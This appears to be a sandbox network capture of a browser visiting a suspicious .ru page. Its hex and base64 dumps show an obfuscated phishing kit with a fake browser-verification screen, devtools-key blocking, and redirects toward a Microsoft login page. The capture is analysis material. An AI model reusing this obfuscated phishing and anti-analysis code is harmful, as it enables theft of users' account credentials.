                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: no-cache, private
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Mlm37wYg%2BqINLlu2fTNsaQWJpYzH%2FnmKbFkyEnczpzFEnarRUoQYZ5vynpzu2QVClVD0DA3gAza5SNILm6rsNNly9KrAFeoR%2FvhIfno%2FUXmywZ%2BBWWOe4tvF6PyNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1280&min_rtt=1277&rtt_var=486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1600&delivery_rate=2182375&cwnd=251&unsent_bytes=0&cid=f92a4e884402fa0b&ts=406&x=0"
                                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InROazA1RE1yVGRRRUJrQ0hydGVZRHc9PSIsInZhbHVlIjoiRTZoUHBYdFhVTnBvUC9kajlDelZuNFdtK1lGUEVIQ1hNdmsrN3FuTjRTN2plVk81d04zblU0Nm1pck53by8zQzBGaGdKWHBnSkVNZjVLTVRsKzVRRUV6UWwyMW5GWDNUVUpMTEMvNGk3bzVabS81R1hwbkpFeTNIREUvQ1cxVWwiLCJtYWMiOiI0NjBlMWI5MGFhN2QyMzlmNzFmMDMyMjViODViM2Q5M2VjMjI2MGUyNzI0YmMzODhiYjk5NWU1ZTg3ZmEyMWY2IiwidGFnIjoiIn0%3D; expires=Thu, 09-Jan-2025 18:18:31 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                        2025-01-09 16:18:32 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 50 57 6b 74 36 52 33 6c 6e 62 58 5a 6d 56 54 4a 52 64 30 35 48 54 47 77 31 51 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 54 67 76 63 79 74 4c 5a 6d 4a 74 54 7a 56 4f 5a 33 6c 32 54 32 4d 7a 5a 43 39 32 61 6b 78 4a 4e 56 42 56 64 55 31 6e 53 33 6c 49 4d 55 74 70 53 6b 6b 7a 55 47 34 72 4c 33 67 34 56 57 5a 5a 52 30 67 76 55 57 6b 79 53 33 56 61 4e 58 4a 74 4f 57 52 76 4f 45 49 7a 53 47 31 6e 4d 32 56 6b 5a 7a 4a 56 57 47 78 56 5a 46 49 72 52 6b 39 42 57 6e 56 4f 65 54 5a 6b 57 45 5a 46 53 32 31 5a 64 30 6f 77 56 31 52 4c 4e 33 5a 43 4d 47 35 48 4e 54 42 30 65 47 31 6a 65 45 34 76 54 56 6b 78 51 58 64 42 56 55 73 31 5a 6b 67
                                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlFPWkt6R3lnbXZmVTJRd05HTGw1QWc9PSIsInZhbHVlIjoidTgvcytLZmJtTzVOZ3l2T2MzZC92akxJNVBVdU1nS3lIMUtpSkkzUG4rL3g4VWZZR0gvUWkyS3VaNXJtOWRvOEIzSG1nM2VkZzJVWGxVZFIrRk9BWnVOeTZkWEZFS21Zd0owV1RLN3ZCMG5HNTB0eG1jeE4vTVkxQXdBVUs1Zkg
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 34 64 66 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 52 56 6e 52 70 4c 6e 46 6c 62 57 6c 30 62 33 4a 75 4c 6e 4a 31 4c 33 6c 36 4f 45 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54
                                                                                                        Data Ascii: 4df2<script>if(atob("aHR0cHM6Ly9RVnRpLnFlbWl0b3JuLnJ1L3l6OEUv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LT
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 31 70 31 54 33 6c 42 57 6b 78 69 54 48 67 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35
                                                                                                        Data Ascii: KndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI1p1T3lBWkxiTHggLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW5
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39
                                                                                                        Data Ascii: iAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 59 67 4b 46 52 35 63 55 4e 61 62 31 46 6f 63 48 49 67 4c 53 42 57 65 6e 5a 69 62 55 70 4c 56 6b 64 32 49 44 34 67 51 57 52 6b 53 32 64 4d 5a 47 4e 45 54 69 41 6d 4a 69 41 68 55 47 35 68 53 30 6c 42 52 6c 68 4c 54 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 56 31 70 72 61 6d 68 36 62 57 31 6a 62 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 51 62 6d 46 4c 53 55 46 47 57 45 74 4d 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 78 76 5a 32 6c 75 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a 53 35 6a 62
                                                                                                        Data Ascii: YgKFR5cUNab1FocHIgLSBWenZibUpLVkd2ID4gQWRkS2dMZGNETiAmJiAhUG5hS0lBRlhLTCkgew0KICAgICAgICAgICAgV1pramh6bW1jbiA9IHRydWU7DQogICAgICAgICAgICBQbmFLSUFGWEtMID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6d 31 46 51 33 64 36 56 6d 68 70 5a 57 30 69 50 67 30 4b 56 6d 56 79 61 57 5a 35 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 30 62 79 42 74 59 57 6c 75 64 47 46 70 62 69 42 68 49 48 4e 6c 59 33 56 79 5a 53 42 69 63 6d 39 33 63 32 6c 75 5a 79 42 6c 65 48 42 6c 63 6d 6c 6c 62 6d 4e 6c 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30 50 67 30 4b 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e
                                                                                                        Data Ascii: iPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9Im1FQ3d6VmhpZW0iPg0KVmVyaWZ5aW5nIHlvdXIgYnJvd3NlciB0byBtYWludGFpbiBhIHNlY3VyZSBicm93c2luZyBleHBlcmllbmNlLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0Pg0KdHVybnN0aWxlLn
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 59 31 5a 30 59 55 46 48 61 32 70 5a 62 79 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 58 57 6d 74 71 61 48 70 74 62 57 4e 75 49 44 30 39 49 47 5a 68 62 48 4e 6c 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56
                                                                                                        Data Ascii: Y1Z0YUFHa2pZbykNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBpZihXWmtqaHptbWNuID09IGZhbHNlKXsNCiAgICAgICAgbG9jYXRpb24ucmV
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 64 20 69 73 20 77 68 61 74 20 70 65 6f 70 6c 65 20 73 61 79 20 61 62 6f 75 74 20 79 6f 75 20 77 68 65 6e 20 79 6f 75 26 23 30 33 39 3b 72 65 20 6e 6f 74 20 69 6e 20 74 68 65 20 72 6f 6f 6d 2e 20 2a 2f 0d 0a 69 66 28 5a 74 53 4b 58 66 64 78 74 53 20 3d 3d 20 79 62 79 77 55 57 4d 79 64 6f 29 7b 0d 0a 63 6f 6e 73 74 20 6d 4d 73 55 48 67 63 6b 61 78 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 62 74 4c 64 4f 6b 6b 55 51 79 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 62 74 4c 64 4f 6b 6b 55 51 79 2e 70 61 74 68 6e 61 6d 65 20 3d 20 62 74 4c 64 4f 6b 6b 55 51 79 2e 70 61
                                                                                                        Data Ascii: d is what people say about you when you&#039;re not in the room. */if(ZtSKXfdxtS == ybywUWMydo){const mMsUHgckax = window.location.pathname.split('%23')[0].split('%3F')[0];if (btLdOkkUQy.pathname.endsWith('/')) {btLdOkkUQy.pathname = btLdOkkUQy.pa
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 70 31 54 33 6c 42 57 6b 78 69 54 48 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 6e 56 50 65 55 46 61 54 47 4a 4d 65 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 70 31 54 33 6c 42 57 6b 78 69 54 48 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f
                                                                                                        Data Ascii: ggaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1p1T3lBWkxiTHggaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojWnVPeUFaTGJMeCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1p1T3lBWkxiTHguY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54
                                                                                                        Data Ascii: 7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.1749746104.17.24.144431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:32 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:32 UTC963INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:32 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"61182885-40eb"
                                                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 97323
                                                                                                        Expires: Tue, 30 Dec 2025 16:18:32 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KHczkMWBa%2BIyb6RdcDNAusOM7igqqQSd%2BkkImRB1LiCyCKfzmNxeou9pwfKx6kObBXAbwzy298SgFu%2BYSYFK45xy4oXjAz4fao%2BvWQGwomuf%2FE7bXtmdR8q0XEc%2FYCoyv44bHJY"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be6b4c4532d9-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:32 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                        Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                                                        Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                                                        Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                                                        Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                                                                        Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
